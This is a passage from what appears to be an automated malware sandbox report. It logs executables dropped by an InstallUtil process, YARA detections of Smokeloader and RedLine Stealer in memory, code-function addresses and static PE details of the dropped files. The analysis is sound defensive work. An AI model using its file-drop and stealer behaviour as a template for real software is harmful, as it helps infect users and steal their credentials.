                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uYudt0flCl0e0fQZ8vnWLOhm.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Imc6gJg8H4cjDDr1J0xEqhfy.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\c36pugF7AAA4eRfz8vwQAxCJ.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\dyzUSu8swmONfKr10ailCBUT.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\kJzN0xpcdgPX8gN1vxWscdbl.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XHapUUFNPyUhtn0ymqhPvOC6.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\ksgmAg6JFdvOTBh26OHdTIc1.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\8p4ak8QNfpnbvonzNVxC2iTG.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\n6BdP4kaWy0FkY7qAUh37msr.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\kbc9DF565eKnpzDzd5tpGZeU.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\kW8yqxmpQubjD4ulwCtyGF1P.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gUW3x0OL7IoJHOyAbWlNdUAG.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\KECo793ffsnuAKrbhcJr4Al2.exe entropy: 7.99369020398Jump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Opera_108.0.5067.24_Autoupdate_x64[3].exe entropy: 7.99847391421Jump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_package entropy: 7.9984734466Jump to dropped file

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000002E.00000002.3117320698.00000000006F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000025.00000002.3137395585.00000000007C2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000025.00000002.3136775469.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000001C.00000002.3386959537.0000000000732000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000016.00000002.3368358435.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000019.00000002.2841787321.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000020.00000002.3324821241.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000019.00000002.2841630563.00000000004F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0042F520 NtdllDefWindowProc_A,15_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00423B84 NtdllDefWindowProc_A,15_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004125D8 NtdllDefWindowProc_A,15_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00478AC0 NtdllDefWindowProc_A,15_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,15_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,15_2_0042E934
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,15_2_004555E4
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess,21_2_00404375
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_0040840C14_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004706A815_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004809F715_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004352C815_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004673A415_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0043035C15_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004444C815_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004345C415_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00444A7015_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00486BD015_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00430EE815_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045F0C415_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0044516815_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045B17415_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0046940415_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0044557415_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004519BC15_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00487B3015_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0043DD5015_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0048DF5415_2_0048DF54
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_0040105116_2_00401051
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_00401C2616_2_00401C26
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 16_2_00406EB316_2_00406EB3
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_0040105117_2_00401051
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_00401C2617_2_00401C26
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_00406EB317_2_00406EB3
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009CE84D17_2_009CE84D
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009CB2FA17_2_009CB2FA
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009D5A6017_2_009D5A60
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009C8B0217_2_009C8B02
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009CE35917_2_009CE359
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009D54E917_2_009D54E9
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009D347417_2_009D3474
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009CEC6517_2_009CEC65
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009CA54417_2_009CA544
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009BF67017_2_009BF670
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EAD2AC22_2_61EAD2AC
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E4B8A122_2_61E4B8A1
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E75F1F22_2_61E75F1F
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E4006522_2_61E40065
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9E24F22_2_61E9E24F
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E5023C22_2_61E5023C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E6255422_2_61E62554
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9A4A722_2_61E9A4A7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E4E4BF22_2_61E4E4BF
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9478322_2_61E94783
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E7A79022_2_61E7A790
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1873622_2_61E18736
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E8666822_2_61E86668
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E5867022_2_61E58670
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1085622_2_61E10856
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EA0BA922_2_61EA0BA9
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E62CA322_2_61E62CA3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E98FE222_2_61E98FE2
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E88FCA22_2_61E88FCA
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E52F8022_2_61E52F80
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EA2F4722_2_61EA2F47
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E56F1822_2_61E56F18
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E4CEF922_2_61E4CEF9
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1EEFF22_2_61E1EEFF
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E64E0C22_2_61E64E0C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EA91F622_2_61EA91F6
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9316A22_2_61E9316A
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9F0ED22_2_61E9F0ED
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EA70CF22_2_61EA70CF
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9D0C322_2_61E9D0C3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E8D0B622_2_61E8D0B6
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E6904E22_2_61E6904E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E4304E22_2_61E4304E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1533722_2_61E15337
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1920822_2_61E19208
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E534E322_2_61E534E3
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E7745222_2_61E77452
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E3793022_2_61E37930
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E7B85E22_2_61E7B85E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E2181622_2_61E21816
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E9FBF022_2_61E9FBF0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E55BD722_2_61E55BD7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EA5B6222_2_61EA5B62
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E91DC122_2_61E91DC1
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E6DDA522_2_61E6DDA5
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E31DAB22_2_61E31DAB
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E95D7A22_2_61E95D7A
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E5BC4C22_2_61E5BC4C
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E25FA222_2_61E25FA2
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E1DEC222_2_61E1DEC2
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E69E8F22_2_61E69E8F
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61E89E0E22_2_61E89E0E
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 004043B0 appears 316 times
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: String function: 009C91A0 appears 37 times
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: String function: 009D59F0 appears 138 times
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: PYAjuaDlqLKzTVmA3BsThyOt.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 86xjLODySsaA2ccNlRbH98y4.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: aUwbp4hWfsJe82ZKgal8jxB3.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: eofj7Pf9I3ORdN1nDBhGJIZl.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: rPFTzpNmT3Qntv8acJaf28oV.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: HnpqZr8MiBteqHFNrwWZBXQR.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 5TjWUMIFlYsM1w3seMz5vnCW.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 4OwcyrblkGc2hCszHEHuZCPV.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: CZMrbdv3aANr0IrdmBiWfjaH.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 53tlSJicrflVnn9iBsteA9ZP.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: EjtrSvV6de28lGZAjtWMHEkL.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: PPRbCMR3JwR3Rpdv3d5rSgFs.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Rk1pfEVtKjXZKi5E0UJ5igqM.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: yXBgs4CMjv6Y3CFxbTDDkpre.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: K38UiC8IqghDOwq5NDROdySK.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: C83U8puVpwkXcWSHiHRNiMd6.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: FnEWeb8TPMfAXv33KZpKVFTq.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: u47GFmiT4x96ZGJgiflf2j9o.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: 5v3yEEfK5SV2v9Tq3rUk66Ct.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: MZK43d4eyhmNVFNhS9RLdaaU.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: KF9G3AcCbu7Zl4IuQK8qDucc.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: dxR7p0Pw8zQ312jALneLeimr.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Q54LGmnZmhktpXP3y7EOrtRY.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
